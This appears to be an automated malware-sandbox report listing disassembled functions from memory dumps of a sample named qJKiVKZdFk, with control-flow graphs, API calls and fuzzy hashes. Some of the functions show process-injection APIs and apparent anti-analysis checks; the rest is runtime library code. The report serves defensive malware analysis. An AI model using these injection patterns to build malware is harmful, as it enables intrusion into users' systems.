                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 93872480-0
                                                                                                                                        • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                        • Instruction ID: 3c99eb84f86120d0ddbb557018f858e2931c5134906ed2288405bf6991fe53f6
                                                                                                                                        • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                                                                        • Instruction Fuzzy Hash: B4B1C874A00208AFDB44CF98C895FAEBBB5FF88314F248158E549AB395D771AE41CF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 15 5de0420-5de04f8 17 5de04ff-5de053c CreateWindowExA 15->17 18 5de04fa 15->18 19 5de053e 17->19 20 5de0540-5de0558 PostMessageA 17->20 21 5de05aa-5de05ad 18->21 19->21 22 5de055f-5de0563 20->22 22->21 23 5de0565-5de0579 22->23 23->21 25 5de057b-5de0582 23->25 26 5de05a8 25->26 27 5de0584-5de0588 25->27 26->22 27->26 28 5de058a-5de0591 27->28 28->26 29 5de0593-5de0597 call 5de0110 28->29 31 5de059c-5de05a5 29->31 31->26
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 05DE0533
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                                                                        • API String ID: 716092398-2341455598
                                                                                                                                        • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                        • Instruction ID: 1ce609e0e41bfe1c81493749e96be1060084855a3b50d4e3ffb1914e6189cbb6
                                                                                                                                        • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                                                                        • Instruction Fuzzy Hash: 7D511670D08388DAEB11DBA8C849BADBFB2AF11708F144059D5446F2C6C3FA5659CB62
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 32 5de05b0-5de05d5 33 5de05dc-5de05e0 32->33 34 5de061e-5de0621 33->34 35 5de05e2-5de05f5 GetFileAttributesA 33->35 36 5de05f7-5de05fe 35->36 37 5de0613-5de061c 35->37 36->37 38 5de0600-5de060b call 5de0420 36->38 37->33 40 5de0610 38->40 40->37
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNELBASE(apfHQ), ref: 05DE05EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID: apfHQ$o
                                                                                                                                        • API String ID: 3188754299-2999369273
                                                                                                                                        • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                        • Instruction ID: c9f7ed62a2051b937cea3a2eb9965a7b660bc0e3c873b3c1fa783b65a0c88571
                                                                                                                                        • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                                                                        • Instruction Fuzzy Hash: 66011E70C0424CEBDB11EB98C5183AEBFB5AF41308F14809DC4492B241D7B69B59CBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 044587C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 41 44587c6-44587df 42 44587e1-44587e3 41->42 43 44587e5 42->43 44 44587ea-44587f6 CreateToolhelp32Snapshot 42->44 43->44 45 4458806-4458813 Module32First 44->45 46 44587f8-44587fe 44->46 47 4458815-4458816 call 4458485 45->47 48 445881c-4458824 45->48 46->45 51 4458800-4458804 46->51 52 445881b 47->52 51->42 51->45 52->48
                                                                                                                                        APIs
                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 044587EE
                                                                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0445880E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244558596.0000000004458000.00000040.00000020.00020000.00000000.sdmp, Offset: 04458000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4458000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3833638111-0
                                                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction ID: d6702302919bd702df95c6beedde64028a7ffb484c9a3cc6af868823087950d2
                                                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                        • Instruction Fuzzy Hash: 2EF06231200714ABDF203BB6AC8DB6BB6E8EF49765F10052AEA42911D1DE70F8554A61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 04458485 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 54 4458485-44584bf call 4458798 57 44584c1-44584f4 VirtualAlloc call 4458512 54->57 58 445850d 54->58 60 44584f9-445850b 57->60 58->58 60->58
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 044584D6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244558596.0000000004458000.00000040.00000020.00020000.00000000.sdmp, Offset: 04458000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_4458000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction ID: 27b4b68df4d455e11049550e7dfbccf26b94576eabdb14c76a447e6ffbaf0172
                                                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                        • Instruction Fuzzy Hash: 41113C79A00208EFDF01DF99C985E99BBF5AF08350F058095F9489B362D771EA90DF80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 05E06437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 551 5e06437-5e06440 552 5e06442-5e06446 551->552 553 5e06466 551->553 552->553 554 5e06448-5e06459 call 5e09636 552->554 555 5e06468-5e0646b 553->555 558 5e0645b-5e06460 call 5e05ba8 554->558 559 5e0646c-5e0647d call 5e09636 554->559 558->553 564 5e06488-5e0649a call 5e09636 559->564 565 5e0647f-5e06480 call 5e0158d 559->565 570 5e064ac-5e064cd call 5e05f4c call 5e06837 564->570 571 5e0649c-5e064aa call 5e0158d * 2 564->571 569 5e06485-5e06486 565->569 569->558 580 5e064e2-5e06500 call 5e0158d call 5e04edc call 5e04d82 call 5e0158d 570->580 581 5e064cf-5e064dd call 5e0557d 570->581 571->569 590 5e06507-5e06509 580->590 587 5e06502-5e06505 581->587 588 5e064df 581->588 587->590 588->580 590->555
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1442030790-0
                                                                                                                                        • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                        • Instruction ID: 2c9afba62720c09a83e795a5cb0fe5c198e1a1a58a7a74963dcc1fcedd2ac193
                                                                                                                                        • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                        • Instruction Fuzzy Hash: BD21D131204201AEEB257FA5EC09E5B7BE5FF41764B50B429F4C6590E1EA2285E0CA91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E03F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 595 5e03f16-5e03f2f 596 5e03f31-5e03f3b call 5e05ba8 call 5e04c72 595->596 597 5e03f49-5e03f5e call 5e0bdc0 595->597 604 5e03f40 596->604 597->596 603 5e03f60-5e03f63 597->603 605 5e03f65 603->605 606 5e03f77-5e03f7d 603->606 611 5e03f42-5e03f48 604->611 607 5e03f67-5e03f69 605->607 608 5e03f6b-5e03f75 call 5e05ba8 605->608 609 5e03f89-5e03f9a call 5e10504 call 5e101a3 606->609 610 5e03f7f 606->610 607->606 607->608 608->604 619 5e03fa0-5e03fac call 5e101cd 609->619 620 5e04185-5e0418f call 5e04c9d 609->620 610->608 613 5e03f81-5e03f87 610->613 613->608 613->609 619->620 625 5e03fb2-5e03fbe call 5e101f7 619->625 625->620 628 5e03fc4-5e03fcb 625->628 629 5e0403b-5e04046 call 5e102d9 628->629 630 5e03fcd 628->630 629->611 636 5e0404c-5e0404f 629->636 632 5e03fd7-5e03ff3 call 5e102d9 630->632 633 5e03fcf-5e03fd5 630->633 632->611 640 5e03ff9-5e03ffc 632->640 633->629 633->632 638 5e04051-5e0405a call 5e10554 636->638 639 5e0407e-5e0408b 636->639 638->639 648 5e0405c-5e0407c 638->648 642 5e0408d-5e0409c call 5e10f40 639->642 643 5e04002-5e0400b call 5e10554 640->643 644 5e0413e-5e04140 640->644 651 5e040a9-5e040d0 call 5e10e90 call 5e10f40 642->651 652 5e0409e-5e040a6 642->652 643->644 653 5e04011-5e04029 call 5e102d9 643->653 644->611 648->642 661 5e040d2-5e040db 651->661 662 5e040de-5e04105 call 5e10e90 call 5e10f40 651->662 652->651 653->611 659 5e0402f-5e04036 653->659 659->644 661->662 667 5e04113-5e04122 call 5e10e90 662->667 668 5e04107-5e04110 662->668 671 5e04124 667->671 672 5e0414f-5e04168 667->672 668->667 675 5e04126-5e04128 671->675 676 5e0412a-5e04138 671->676 673 5e0416a-5e04183 672->673 674 5e0413b 672->674 673->644 674->644 675->676 677 5e04145-5e04147 675->677 676->674 677->644 678 5e04149 677->678 678->672 679 5e0414b-5e0414d 678->679 679->644 679->672
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 05E03F51
                                                                                                                                          • Part of subcall function 05E05BA8: __getptd_noexit.LIBCMT ref: 05E05BA8
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05E03FEA
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05E04020
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 05E0403D
                                                                                                                                        • __allrem.LIBCMT ref: 05E04093
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E040AF
                                                                                                                                        • __allrem.LIBCMT ref: 05E040C6
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E040E4
                                                                                                                                        • __allrem.LIBCMT ref: 05E040FB
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 05E04119
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05E0418A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                        • Instruction ID: c372855331b8ab95c6863110082e03b2b845246da20cf61dbba51b75361f4471
                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                        • Instruction Fuzzy Hash: 7871F971B00716ABEB249E79CD45BAAB3B9BF04324F147539F994D72C0E770D9808790
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E0650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3432600739-0
                                                                                                                                        • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                        • Instruction ID: 28515901f672e698395d769db16ab65f78d472ffffe58d1e62fa0d1b7aaed74b
                                                                                                                                        • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                        • Instruction Fuzzy Hash: 5B413432A04308AFEB00AFA4ED88B9E3BE5FF04314F107429E985961D1DB7596D5DB11
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E084AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 744 5e084ab-5e084d9 call 5e08477 749 5e084f3-5e0850b call 5e0158d 744->749 750 5e084db-5e084de 744->750 757 5e08524-5e0855a call 5e0158d * 3 749->757 758 5e0850d-5e0850f 749->758 751 5e084e0-5e084eb call 5e0158d 750->751 752 5e084ed 750->752 751->750 751->752 752->749 769 5e0856b-5e0857e 757->769 770 5e0855c-5e08562 757->770 759 5e08511-5e0851c call 5e0158d 758->759 760 5e0851e 758->760 759->758 759->760 760->757 774 5e08580-5e08587 call 5e0158d 769->774 775 5e0858d-5e08594 769->775 770->769 771 5e08564-5e0856a call 5e0158d 770->771 771->769 774->775 778 5e085a3-5e085ae 775->778 779 5e08596-5e0859d call 5e0158d 775->779 782 5e085b0-5e085bc 778->782 783 5e085cb-5e085cd 778->783 779->778 782->783 785 5e085be-5e085c5 call 5e0158d 782->785 785->783
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ExitProcess___crt
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1022109855-0
                                                                                                                                        • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                        • Instruction ID: 758581b95a46b3ce6895d8c0cb87a876a75be6bb6a0d8a62e0114b1cb8e16811
                                                                                                                                        • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                        • Instruction Fuzzy Hash: 4F31B431A08250DFDB255F94FC8485977B4FB14324704B62AE9C56B2E0CBB459C9EF94
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E2FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E2FC1F
                                                                                                                                          • Part of subcall function 05E1169C: std::exception::_Copy_str.LIBCMT ref: 05E116B5
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E2FC34
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E2FC4D
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E2FC62
                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 05E2FC74
                                                                                                                                          • Part of subcall function 05E2F914: std::exception::exception.LIBCMT ref: 05E2F92E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E2FC82
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E2FC9B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E2FCB0
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                                                        • String ID: leM
                                                                                                                                        • API String ID: 3569886845-2926266777
                                                                                                                                        • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                        • Instruction ID: 454c4714fede138269d25820db1d0d37397ca74f0921601a3e20edf733c97c6c
                                                                                                                                        • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                        • Instruction Fuzzy Hash: 9D11FE79D0020DBBCF04FFA5D459CDEBB7CAA04344F40C566AD6597244EB74A348CB99
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DEF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3721157643-0
                                                                                                                                        • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                        • Instruction ID: b642e6f8a6446d392e99a3d1fdb70132359ec6d30dac76b27221a7b3a505870a
                                                                                                                                        • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                        • Instruction Fuzzy Hash: 021127B66005506AC66273F45C19FFF3BEC9F45311F0410AAFACCE51C0DA185A4493B1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DF1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 65388428-0
                                                                                                                                        • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                        • Instruction ID: d523b213369d1382de1afb4d7661f845466876610e61dfb4781f1b7d0e1be91b
                                                                                                                                        • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                        • Instruction Fuzzy Hash: 84514A71E40219EBDB11DBE5DC89FAFBBB8FB04744F100026FA45B6180EB745A01CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DEF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                        • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                        • Instruction ID: a07a8e7375f1c08008b9d851ff36896b16a8910c8bd463044ec8209c8e4f5c98
                                                                                                                                        • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                        • Instruction Fuzzy Hash: 4A5151B1E40209EADF11DFA1DC4AFEEBBB9FB04704F105026F945B6180D775AA05CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DEF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                        • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                        • Instruction ID: 11454a73af5114d405516201c9cfc12122e084f3df07588f84b0561272ef1210
                                                                                                                                        • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                        • Instruction Fuzzy Hash: 4E516371E40209AADF11DFA1DC85FFFBBB8FB04744F10412AF945B6180DA74AA05CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E2208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3534693527-0
                                                                                                                                        • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                        • Instruction ID: 12cb22df7922e0ed15aa8d009795c082cd77ac52b1e75db947d9f6000603d054
                                                                                                                                        • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                        • Instruction Fuzzy Hash: A6310836B043316BEB217F658C08FAE7755AF05B24F147015EB85DB2C8DB74998186A2
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05EA66D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd_noexit.LIBCMT ref: 05EA66DD
                                                                                                                                          • Part of subcall function 05E059BF: __calloc_crt.LIBCMT ref: 05E059E2
                                                                                                                                          • Part of subcall function 05E059BF: __initptd.LIBCMT ref: 05E05A04
                                                                                                                                        • __calloc_crt.LIBCMT ref: 05EA6700
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 05EA671E
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05EA673B
                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 05EA676D
                                                                                                                                        • __invoke_watson.LIBCMT ref: 05EA678B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.1244671566.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_5de0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4066021419-0
                                                                                                                                        • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                        • Instruction ID: 2f0e9b745ec88784513b565a9f7b56df4a730a563578682880bbac506c2043f4
                                                                                                                                        • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                        • Instruction Fuzzy Hash: 2C11C433B002146BFB227B35DD48EBA739DEF42664F042466FEC99E290E721ED4046D4
